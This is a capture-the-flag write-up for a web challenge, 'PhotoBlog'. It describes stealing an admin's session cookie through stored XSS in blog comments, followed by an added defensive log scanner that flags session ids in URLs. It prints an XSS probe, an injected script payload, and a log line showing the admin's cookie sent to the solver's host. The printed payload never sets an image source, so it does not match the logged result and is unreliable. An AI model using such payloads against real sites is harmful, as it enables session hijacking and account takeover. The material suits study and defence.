# PhotoBlog

A friend of mine has stolen my cat's picture on his blog. I want to log in as admin user on his blog. Do you have any idea?

## Solution

By posting comments such as `<script>alert(123)</script>`, we notice that there is an XSS vulnerability.

The admin panel is located at `admin.php`. However, when we try to access it, we are redirected to `login.php`.
The XSS vulnerability can be used to get the admin's cookie in order to connect to `admin.php`.

After we posted the following comment:

```javascript
<script>
im=document.createElement('img');
document.body.appendChild(im);
</script>
```

we got the following request in our logs:

```
213.233.185.27 - - [06/Feb/2016:14:52:07 +0100] "GET /pirate.png?loc=http://172.17.118.91:8083/privateindex.php?id=Quokka&cookie=PHPSESSID=515386866780b5f132fc96c02b3ddb82 HTTP/1.1" 404 142 "http://172.17.118.91:8083/privateindex.php?id=Quokka" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"
```

The admin's PHPSESSID is 515386866780b5f132fc96c02b3ddb82.

Once we change our cookie to this value, we can access `admin.php` and get the flag.
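
Seen from the defender's side, the logged request above is also the detection signal: a request URL that carries a `PHPSESSID` value. The following is an added example, not part of the original writeup. It scans Combined Log Format lines (for instance from an egress proxy, which is an assumption) for session ids in URLs and reports which sessions to invalidate and which page issued the request. The second and third sample lines are constructed.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# PHP's default session cookie name, then an id in PHP's id alphabet.
SESSION_RE = re.compile(r'PHPSESSID=([A-Za-z0-9,-]{22,256})')


def leaked_sessions(lines):
    """Return one finding per logged request whose URL carries a session id."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line: skip it rather than guess
        # Decode first so a percent-encoded "PHPSESSID%3D..." is also caught.
        ids = SESSION_RE.findall(unquote(m['target']))
        if ids:
            findings.append({
                'time': m['time'],
                'client': m['ip'],
                'session_ids': ids,            # sessions to invalidate server-side
                'source_page': m['referer'],   # page to inspect for injected markup
            })
    return findings


SAMPLE = [
    # The request quoted in the writeup above.
    '213.233.185.27 - - [06/Feb/2016:14:52:07 +0100] "GET /pirate.png?loc='
    'http://172.17.118.91:8083/privateindex.php?id=Quokka&cookie=PHPSESSID='
    '515386866780b5f132fc96c02b3ddb82 HTTP/1.1" 404 142 '
    '"http://172.17.118.91:8083/privateindex.php?id=Quokka" "Mozilla/5.0 '
    '(Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) '
    'PhantomJS/1.9.0 Safari/534.34"',
    # Constructed: the same kind of leak with the cookie percent-encoded.
    '192.0.2.10 - - [06/Feb/2016:14:53:00 +0100] "GET /x.gif?c=PHPSESSID%3D'
    '0123456789abcdef0123456789abcdef HTTP/1.1" 404 142 '
    '"http://photoblog.example/index.php" "Mozilla/5.0"',
    # Constructed: an ordinary image request that must not be flagged.
    '192.0.2.11 - - [06/Feb/2016:14:54:00 +0100] "GET /cat.png HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
]
```

Every id returned here should be destroyed server-side. Setting the `HttpOnly` flag on the session cookie keeps `document.cookie` from exposing it, and HTML-escaping comments on output removes the injection itself.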

Original writeup (https://github.com/QuokkaLight/write-ups/blob/master/sharif-university-ctf-2016/web/PhotoBlog.md).